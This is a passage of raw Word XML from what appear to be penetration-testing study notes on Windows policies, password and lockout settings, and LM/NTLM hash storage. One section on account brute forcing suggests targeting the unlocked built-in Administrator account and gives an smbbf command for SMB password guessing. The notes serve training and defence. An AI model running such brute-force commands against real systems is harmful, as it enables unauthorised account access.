      </w:r>
      <w:r w:rsidR="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used for domain or local user accounts. Determines the circumstances and length of time that an account will be locked out of the system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C35BB"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 xml:space="preserve">Kerberos policy </w:t>
      </w:r>
      <w:r w:rsidR="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Used for domain user accounts. Determines </w:t>
      </w:r>
      <w:r w:rsidR="002E1FD9" w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kerberos-related settings, such</w:t>
      </w:r>
      <w:r w:rsidR="00735E25" w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">as ticket lifetimes and enforcement. Kerberos policies do not exist in local computer policy. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3041" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="003C35BB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>For domain accounts, there can be only one account policy. The account policy must be defined in the Default Domain policy and is enforced by the domain controllers that make up the domain. A domain controller always obtains the account policy from the Default Domain Policy Group Policy object, even if there is a different account policy applied to the organizational unit that contains the domain controller. By default, workstations and servers joined to a domain (such as member computers) will also receive the same account policy for their local accounts. However, local account policies can be different from the domain account policy, such as when you define an account policy specifically for the local accounts.</w:t>
      </w:r>
      <w:r w:rsidR="003C35BB" w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3041" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="000C3041">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3041" w:rsidRPr="008557B5" w:rsidRDefault="000C3041" w:rsidP="000C3041">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Local policies</w:t>
      </w:r>
      <w:r w:rsidR="003C35BB" w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>These policies apply to a computer and contain these subsets:</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 xml:space="preserve">Audit policy </w:t>
      </w:r>
      <w:r w:rsidR="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determines whether security events are logged into the Security log on the computer. Also determines whether to log successful attempts, failed attempts or both. (The Security log is part of Event Viewer.) </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User rights assignment</w:t>
      </w:r>
      <w:r w:rsidR="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Determines which users or groups have logon rights or privileges on the computer. </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 xml:space="preserve">Security options </w:t>
      </w:r>
      <w:r w:rsidR="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enables or disables security settings for the computer, such as digital signing of data, Administrator and Guest account names, floppy drive and CD-ROM access, driver installation, and logon prompts. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">E4 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Windows Passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="002E1FD9" w:rsidRDefault="00FA3D71" w:rsidP="002E1FD9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E4a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Password policies (complexity, lockout policies)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E1FD9" w:rsidRPr="008557B5" w:rsidRDefault="002E1FD9" w:rsidP="00E47CD4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Strong password</w:t>
      </w:r>
      <w:r w:rsidR="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a critical to security and are mandated through a good password policy:</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Enforce password history (24 new password before reuse)</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Maximum password age  (30 days – change every month)</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Minimum password age ( 2 days – can’t change to quickly)</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Minimum password length (8 chars – harder to bruteforce)</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Passwords must meet complexity requirements (minimum 1 upper, 1 lower, 1 number/special)</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Store password using reversible encryption for all users in the domain (</w:t>
      </w:r>
      <w:r w:rsidR="002717D6" w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>don’t do – unsafe)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E1FD9" w:rsidRPr="008557B5" w:rsidRDefault="002E1FD9" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E1FD9" w:rsidRPr="008557B5" w:rsidRDefault="002E1FD9" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Account lock out policy should be set to prevent brute force attack</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Account lockout duration </w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>30 minutes</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Account lockout threshold </w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>5 attempts</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Reset account lockout counter after </w:t>
      </w:r>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>30 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E4b - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Account Brute Forcing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="008557B5" w:rsidRDefault="00735E25" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Administrator account is safest on pre-2008 servers as it has no lockout applied. Be sure to use SID...500 if the account has been renamed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00735E25" w:rsidRPr="008557B5" w:rsidRDefault="00735E25" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00735E25" w:rsidRPr="008557B5" w:rsidRDefault="00735E25" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If you have the account lockout policy and there is none then you fair game to do this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00735E25" w:rsidRPr="008557B5" w:rsidRDefault="00735E25" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="008557B5" w:rsidRDefault="008557B5" w:rsidP="008557B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557B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smbbf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –i &lt;ip&gt; --p pass.txt –u user.txt –v –P1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E4c - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Hash Storage (merits of LANMAN, NTLMv1 / v2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="008557B5" w:rsidRDefault="009D6D8E" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00214A08" w:rsidRDefault="008557B5" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANMAN:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008557B5" w:rsidRPr="008557B5" w:rsidRDefault="008557B5" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LM hash or LAN Manager </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is one of the formats that Microsoft LAN Manager and Microsoft Windows versions previous to Windows Vista use to store user passwords that are fewer than 15 characters long. This type of hash is the only type of encryption used in Microsoft LAN Manager, hence the name, and versions of Windows up to Windows Me. It is also supported in more recent Windows versions for backward compatibility, although in Windows Vista and later it must explicitly be enabled for use as it is turned off by default.</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LM hash is computed as follows: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user’s password is converted to uppercase.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This password is null-padded to 14 bytes. If the password is more than 14 characters long, the LMHash cannot be computed.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“fixed-length” password is split into two 7-byte halves.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These values are used to create two DES keys, one from each 7-byte half, by converting the seven bytes into a bit stream, and inserting a zero bit after every seven bits. This generates the 64 bits needed for the DES key.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Each of these keys is used to DES-encrypt the constant ASCII string “KGS!@#$%”, resulting in two 8-byte ciphertext values.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These two ciphertext values are concatenated to form a 16-byte value, which is the LM hash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008557B5" w:rsidRDefault="008557B5" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008557B5" w:rsidRDefault="008557B5" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Although it is based on DES, a well-studied block cipher, the LM hash can easily be cracked due to two weaknesses in its implementation. First, passwords longer than 7 characters are divided into two pieces and each piece is hashed separately. Second, all lower case letters in the password are changed to upper case before the password is hashed. The first weakness allows each half of the password to be attacked separately</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008557B5" w:rsidRDefault="008557B5" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008557B5">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>By mounting a brute force attack on each half separately, modern desktop machines can crack alphanumeric LM hashes in a few hours.</w:t>
      </w:r>
      <w:r w:rsidR="00214A08" w:rsidRPr="00214A08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214A08" w:rsidRDefault="00214A08" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00214A08" w:rsidRPr="00214A08" w:rsidRDefault="00214A08" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>NTLM:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214A08" w:rsidRPr="00214A08" w:rsidRDefault="00214A08" w:rsidP="00214A08">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>To address the security weaknesses inherent in LM encryption, Microsoft introduced the NTLM algorithm with Windows NT 3.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NTLM (NT LAN Manager) is a Microsoft authentication protocol used with the SMB protocol. MS-CHAP is similar and is used for authentication with Microsoft remote access protocols.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The protocol uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">challenge-response sequence requiring the transmission of three messages between the client (wishing to authenticate) and the server (requesting authentication):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 xml:space="preserve">The client first sends a Type 1 message containing a set of flags of features supported or requested (such as encryption key sizes, request for mutual authentication, etc.) to the server.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 xml:space="preserve">The server responds with a Type 2 message containing a similar set of flags supported or required by the server (thus enabling an agreement on the authentication parameters between the server and the client) and, more importantly, a random challenge (8 bytes).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Finally, the client uses the challenge obtained from the Type 2 message and the user's credentials to calculate the response. The calculation methods differ based on the NTLM authentication parameters negotiated previously, but in general they apply MD4/MD5 hashing algorithms and DES encryption to compute the response. The client then sends the response to the server in a Type 3 message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214A08" w:rsidRDefault="00214A08" w:rsidP="00214A08">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00214A08" w:rsidRPr="00214A08" w:rsidRDefault="00214A08" w:rsidP="00214A08">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLMv1 is a challenge-response authentication protocol. The server authenticates the client by sending an 8-byte random number, the challenge. The client performs an operation involving the challenge and a secret shared between client and server, e.g. a password. The client returns the 24-byte result of the computation. In fact, in NTLMv1 two computations are made using two different shared secrets and two 24-byte results are returned. The server verifies that the client has computed the correct result, and from this infers possession of the secret, and hence the identity of the client. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The two secrets are: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214A08" w:rsidRPr="00214A08" w:rsidRDefault="00214A08" w:rsidP="00214A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the LANMAN Hash of the user's password and </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214A08" w:rsidRPr="00214A08" w:rsidRDefault="00214A08" w:rsidP="00214A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the MD4 hash of the user's password </w:t>
      </w:r>
      <w:r w:rsidR="006D4F5A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(NT-HASH)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214A08" w:rsidRDefault="00214A08" w:rsidP="00214A08">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Both these hashes produce 16-byte quantities. Five bytes of zeros are appended to obtain 21 bytes. The 21 bytes are separated in three 7 bytes quantities. Each of these 56 bit quantities is used as a key to DES encrypt the 64 bit challenge. The three encryptions of the challenge are reunited to form the 24-byte response. Both the response using the lanman hash and the MD4 hash (called the NT Hash) are returned as the response.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214A08" w:rsidRDefault="00214A08" w:rsidP="00214A08">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00214A08" w:rsidRDefault="006D4F5A" w:rsidP="00214A08">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D4F5A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
